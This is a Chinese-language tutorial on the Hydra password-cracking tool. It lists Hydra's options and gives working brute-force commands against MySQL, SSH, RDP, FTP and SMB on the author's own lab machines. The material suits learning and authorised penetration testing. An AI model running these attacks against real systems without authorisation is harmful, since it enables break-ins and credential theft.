Hydra工具的使用

目录

Hydra初识

Hydra使用

hydra破解mysql

不固定用户名密码爆破

hydra破解ssh

以用户名为密码登录

hydra破解rdp

将爆破密码的结果输出到文件中

hydra破解FTP

hydra破解smb

Hydra初识

前言：

• hydra是一款开源的暴力破解工具，支持多种服务破解
• 原理：使用户字典文件的内容与密码字典文件的内容一一做碰撞

Hydra使用

语法：hydra [options] IP地址 服务名

options

• -l 用户名：指定登录的用户名
• -L 用户名密码字典：指定用户名字典
• -p 密码：指定密码
• -P 密码字典：指定密码字典
• -o 文件名：输出文件
• -s port：指定端口
• -t n：指定线程数为n（n越大破解越快，破解精度越低）
• -e n/s/r：n尝试空密码，s以用户名为密码，r用户名反向为密码
• -vV：显示详细过程（可以看见电脑尝试密码过程）
• -f：在找到第一对登陆用户名和密码时停止

注意：用户名，用户名密码字典以及密码，密码字典只能各存在一个 

注意：这个端口只是举例，其是默认端口 

查看帮助文档：hydra -h

hydra破解mysql

前言

• mysql服务器所在的ip：192.168.1.2
• 事先准备好用户字典和密码字典（用户名文件有对应的用户名，密码文件有该用户名对应的密码）
• 事先确保3306端口的开启，没开启开防火墙（用nmap检测）
• 事先设置好mysql数据库的远程连接和mysql密码允许失败次数

不固定用户名密码爆破

语法：hydra -L username.txt -P password.txt -s 3306 -f 192.168.1.2 mysql

注意：

• 也可以指定用户名，密码用密码字典或指定密码，用户名用用户字典来爆破
• 字典文件可以用相对路径也可以用绝对路径（我上面用的是相对路径） 

hydra破解ssh

前言：我的centos虚拟机IP地址为——192.168.1.35

语法：hydra -l root -P password.txt -s 22 -t 4 -vV 192.168.1.35 ssh

注意：一般用ssh服务的22端口连接服务器。

以用户名为密码登录

前言：因为我已经知道用户名密码是一样的，那么干脆趁现在测试一下-e参数

语法：hydra -l root -e s -s 22 -vV 192.168.1.35 ssh

注意：这里的用户名也可以用字典文件

命令：hydra -L username.txt -e s -s 22 -vV 192.168.1.35 ssh

hydra破解rdp

前言：

• 我的win10的rdp服务为192.168.1.7，端口为：3389
• 事先要配置允许远程桌面进行连接

语法：hydra -l lili -P password.txt -s 3389 192.168.1.7 rdp

将爆破密码的结果输出到文件中

语法：hydra -l root -P password.txt -s 3306 -o mima.txt 192.168.1.2 mysql

解释：将mysql服务破解的用户名和密码输出到mima.txt文件中

hydra破解FTP

前言：物理机192.168.18.4开启FTP服务，端口21

语法：hydra -l Administrator -P password.txt -s 21 192.168.18.4 ftp

hydra破解smb

前言：物理机192.168.18.4开启windows共享服务，端口445

语法：hydra -l Administrator -P password.txt -s 445 192.168.18.4 smb